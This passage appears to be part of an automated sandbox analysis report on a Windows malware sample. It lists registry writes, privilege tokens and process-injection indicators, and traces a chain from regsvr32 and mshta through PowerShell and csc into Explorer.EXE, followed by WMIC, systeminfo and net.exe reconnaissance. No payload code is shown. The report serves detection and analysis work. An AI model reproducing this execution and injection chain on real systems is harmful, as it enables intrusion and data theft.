Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\537bbff6-9f1e-4421- = e868d9802ca7d801 RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\269dfa06-9572-4768- RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\10ee7df4-5ff7-400d- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa158c3c-bf95-4ac3- RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c088cdab-3a8c-4c86- = 52fe557f2ca7d801 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\447bb508-04c2-4c88- = d2325f802ca7d801 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\eafae361-ed19-4d70- RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\537bbff6-9f1e-4421- RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\537bbff6-9f1e-4421- = "0" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f416a38f-aadb-4940- = d8acf77a2ca7d801 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa158c3c-bf95-4ac3- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000007ac7007b2ca7d8017ac7007b2ca7d8017ac7007b2ca7d801000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000000355d95b2000633033633862643362353930386636633864666665613338663336336437346338656535653230316339616666353437383235366338616139303533666365340000b20009000400efbe0355d95b0355d95b2e0000000000000000000000000000000000000000000000000086098200630030003300630038006200640033006200350039003000380066003600630038006400660066006500610033003800660033003600330064003700340063003800650065003500650032003000310063003900610066006600350034003700380032003500360063003800610061003900300035003300660063006500340000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000955f02a81000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c63303363386264336235393038663663386466666561333866333633643734633865653565323031633961666635343738323536633861613930353366636534000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157ad8548b61ef08ed11b78de670f6038bdabca7cefcc5848241ae2fb45b654f157ad8548b61ef08ed11b78de670f6038bdace000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5253ac7f-922f-4da2- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000d6f0077b2ca7d801d6f0077b2ca7d801d6f0077b2ca7d801000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000000355d95b2000656532653161376439643366363033636132323164316238343932373330653936363833343361653038656539636463613335663638626138323661336538350000b20009000400efbe0355d95b0355d95b2e000000000000000000000000000000000000000000000000002ae07a00650065003200650031006100370064003900640033006600360030003300630061003200320031006400310062003800340039003200370033003000650039003600360038003300340033006100650030003800650065003900630064006300610033003500660036003800620061003800320036006100330065003800350000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000955f02a81000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c65653265316137643964336636303363613232316431623834393237333065393636383334336165303865653963646361333566363862613832366133653835000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157ad9548b61ef08ed11b78de670f6038bdabca7cefcc5848241ae2fb45b654f157ad9548b61ef08ed11b78de670f6038bdace000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4690926b-90c0-4dc8- RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4690926b-90c0-4dc8- = 3937117b2ca7d801 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\447bb508-04c2-4c88- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\ee2e1a7d9d3f603ca221d1b8492730e9668343ae08ee9cdca35f68ba826a3e85" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5253ac7f-922f-4da2- = "0" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4690926b-90c0-4dc8- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\e456f0c910cf1e03f73ccd374fb3b13d2523a54a4c17bffcdb526f9b4d2e3054" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5a1fb410-c912-48d1- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c088cdab-3a8c-4c86- RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c088cdab-3a8c-4c86- = "8324" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\447bb508-04c2-4c88- = "8324" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\390e91e6-0382-4d16- = 94fb917a2ca7d801 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4690926b-90c0-4dc8- RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c088cdab-3a8c-4c86- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000006bfe317c2ca7d8018c80847d2ca7d8018c80847d2ca7d80140f91a000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000000355d95b2000633033633862643362353930386636633864666665613338663336336437346338656535653230316339616666353437383235366338616139303533666365340000b20009000400efbe0355d95b0355d95b2e0000000000000000000000000000000000000000000000000086098200630030003300630038006200640033006200350039003000380066003600630038006400660066006500610033003800660033003600330064003700340063003800650065003500650032003000310063003900610066006600350034003700380032003500360063003800610061003900300035003300660063006500340000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000955f02a81000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c63303363386264336235393038663663386466666561333866333633643734633865653565323031633961666635343738323536633861613930353366636534000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157add548b61ef08ed11b78de670f6038bdabca7cefcc5848241ae2fb45b654f157add548b61ef08ed11b78de670f6038bdace000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\10ee7df4-5ff7-400d- = "8324" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\537bbff6-9f1e-4421- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\e456f0c910cf1e03f73ccd374fb3b13d2523a54a4c17bffcdb526f9b4d2e3054" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\447bb508-04c2-4c88- RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6bc68a4b-b0ee-4f30- = "8324" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\390e91e6-0382-4d16- = "0" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5a1fb410-c912-48d1- RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\eafae361-ed19-4d70- = "8324" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\537bbff6-9f1e-4421- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\390e91e6-0382-4d16- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa158c3c-bf95-4ac3- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
regsvr32.exepowershell.exeExplorer.EXEpid process 4732 regsvr32.exe 4732 regsvr32.exe 2160 powershell.exe 2160 powershell.exe 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 1032 Explorer.EXE -
Suspicious behavior: MapViewOfSection 5 IoCs
Processes:
powershell.exeExplorer.EXEpid process 2160 powershell.exe 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE 1032 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 49 IoCs
Processes:
powershell.exeExplorer.EXEWMIC.exetasklist.exeRuntimeBroker.exedescription pid process Token: SeDebugPrivilege 2160 powershell.exe Token: SeShutdownPrivilege 1032 Explorer.EXE Token: SeCreatePagefilePrivilege 1032 Explorer.EXE Token: SeIncreaseQuotaPrivilege 4148 WMIC.exe Token: SeSecurityPrivilege 4148 WMIC.exe Token: SeTakeOwnershipPrivilege 4148 WMIC.exe Token: SeLoadDriverPrivilege 4148 WMIC.exe Token: SeSystemProfilePrivilege 4148 WMIC.exe Token: SeSystemtimePrivilege 4148 WMIC.exe Token: SeProfSingleProcessPrivilege 4148 WMIC.exe Token: SeIncBasePriorityPrivilege 4148 WMIC.exe Token: SeCreatePagefilePrivilege 4148 WMIC.exe Token: SeBackupPrivilege 4148 WMIC.exe Token: SeRestorePrivilege 4148 WMIC.exe Token: SeShutdownPrivilege 4148 WMIC.exe Token: SeDebugPrivilege 4148 WMIC.exe Token: SeSystemEnvironmentPrivilege 4148 WMIC.exe Token: SeRemoteShutdownPrivilege 4148 WMIC.exe Token: SeUndockPrivilege 4148 WMIC.exe Token: SeManageVolumePrivilege 4148 WMIC.exe Token: 33 4148 WMIC.exe Token: 34 4148 WMIC.exe Token: 35 4148 WMIC.exe Token: 36 4148 WMIC.exe Token: SeIncreaseQuotaPrivilege 4148 WMIC.exe Token: SeSecurityPrivilege 4148 WMIC.exe Token: SeTakeOwnershipPrivilege 4148 WMIC.exe Token: SeLoadDriverPrivilege 4148 WMIC.exe Token: SeSystemProfilePrivilege 4148 WMIC.exe Token: SeSystemtimePrivilege 4148 WMIC.exe Token: SeProfSingleProcessPrivilege 4148 WMIC.exe Token: SeIncBasePriorityPrivilege 4148 WMIC.exe Token: SeCreatePagefilePrivilege 4148 WMIC.exe Token: SeBackupPrivilege 4148 WMIC.exe Token: SeRestorePrivilege 4148 WMIC.exe Token: SeShutdownPrivilege 4148 WMIC.exe Token: SeDebugPrivilege 4148 WMIC.exe Token: SeSystemEnvironmentPrivilege 4148 WMIC.exe Token: SeRemoteShutdownPrivilege 4148 WMIC.exe Token: SeUndockPrivilege 4148 WMIC.exe Token: SeManageVolumePrivilege 4148 WMIC.exe Token: 33 4148 WMIC.exe Token: 34 4148 WMIC.exe Token: 35 4148 WMIC.exe Token: 36 4148 WMIC.exe Token: SeShutdownPrivilege 1032 Explorer.EXE Token: SeCreatePagefilePrivilege 1032 Explorer.EXE Token: SeDebugPrivilege 2860 tasklist.exe Token: SeShutdownPrivilege 3452 RuntimeBroker.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Explorer.EXEpid process 1032 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
regsvr32.exemshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 2144 wrote to memory of 4732 2144 regsvr32.exe regsvr32.exe PID 2144 wrote to memory of 4732 2144 regsvr32.exe regsvr32.exe PID 2144 wrote to memory of 4732 2144 regsvr32.exe regsvr32.exe PID 3944 wrote to memory of 2160 3944 mshta.exe powershell.exe PID 3944 wrote to memory of 2160 3944 mshta.exe powershell.exe PID 2160 wrote to memory of 5056 2160 powershell.exe csc.exe PID 2160 wrote to memory of 5056 2160 powershell.exe csc.exe PID 5056 wrote to memory of 3696 5056 csc.exe cvtres.exe PID 5056 wrote to memory of 3696 5056 csc.exe cvtres.exe PID 2160 wrote to memory of 3472 2160 powershell.exe csc.exe PID 2160 wrote to memory of 3472 2160 powershell.exe csc.exe PID 3472 wrote to memory of 4788 3472 csc.exe cvtres.exe PID 3472 wrote to memory of 4788 3472 csc.exe cvtres.exe PID 2160 wrote to memory of 1032 2160 powershell.exe Explorer.EXE PID 2160 wrote to memory of 1032 2160 powershell.exe Explorer.EXE PID 2160 wrote to memory of 1032 2160 powershell.exe Explorer.EXE PID 2160 wrote to memory of 1032 2160 powershell.exe Explorer.EXE PID 1032 wrote to memory of 3452 1032 Explorer.EXE RuntimeBroker.exe PID 1032 wrote to memory of 3452 1032 Explorer.EXE RuntimeBroker.exe PID 1032 wrote to memory of 3452 1032 Explorer.EXE RuntimeBroker.exe PID 1032 wrote to memory of 3452 1032 Explorer.EXE RuntimeBroker.exe PID 1032 wrote to memory of 3752 1032 Explorer.EXE RuntimeBroker.exe PID 1032 wrote to memory of 3752 1032 Explorer.EXE RuntimeBroker.exe PID 1032 wrote to memory of 3752 1032 Explorer.EXE RuntimeBroker.exe PID 1032 wrote to memory of 3752 1032 Explorer.EXE RuntimeBroker.exe PID 1032 wrote to memory of 4544 1032 Explorer.EXE RuntimeBroker.exe PID 1032 wrote to memory of 4544 1032 Explorer.EXE RuntimeBroker.exe PID 1032 wrote to memory of 4544 1032 Explorer.EXE RuntimeBroker.exe PID 1032 wrote to memory of 4544 1032 Explorer.EXE RuntimeBroker.exe PID 1032 wrote to memory of 4380 1032 Explorer.EXE cmd.exe PID 1032 wrote to memory of 4380 1032 Explorer.EXE cmd.exe PID 4380 wrote to memory of 4148 4380 cmd.exe WMIC.exe PID 4380 wrote to memory of 4148 4380 cmd.exe WMIC.exe PID 1032 wrote to memory of 4916 1032 Explorer.EXE cmd.exe PID 1032 wrote to memory of 4916 1032 Explorer.EXE cmd.exe PID 1032 wrote to memory of 4916 1032 Explorer.EXE cmd.exe PID 1032 wrote to memory of 4916 1032 Explorer.EXE cmd.exe PID 4380 wrote to memory of 4912 4380 cmd.exe more.com PID 4380 wrote to memory of 4912 4380 cmd.exe more.com PID 1032 wrote to memory of 4916 1032 Explorer.EXE cmd.exe PID 1032 wrote to memory of 4916 1032 Explorer.EXE cmd.exe PID 1032 wrote to memory of 3408 1032 Explorer.EXE cmd.exe PID 1032 wrote to memory of 3408 1032 Explorer.EXE cmd.exe PID 1032 wrote to memory of 4476 1032 Explorer.EXE cmd.exe PID 1032 wrote to memory of 4476 1032 Explorer.EXE cmd.exe PID 4476 wrote to memory of 1308 4476 cmd.exe systeminfo.exe PID 4476 wrote to memory of 1308 4476 cmd.exe systeminfo.exe PID 1032 wrote to memory of 2092 1032 Explorer.EXE cmd.exe PID 1032 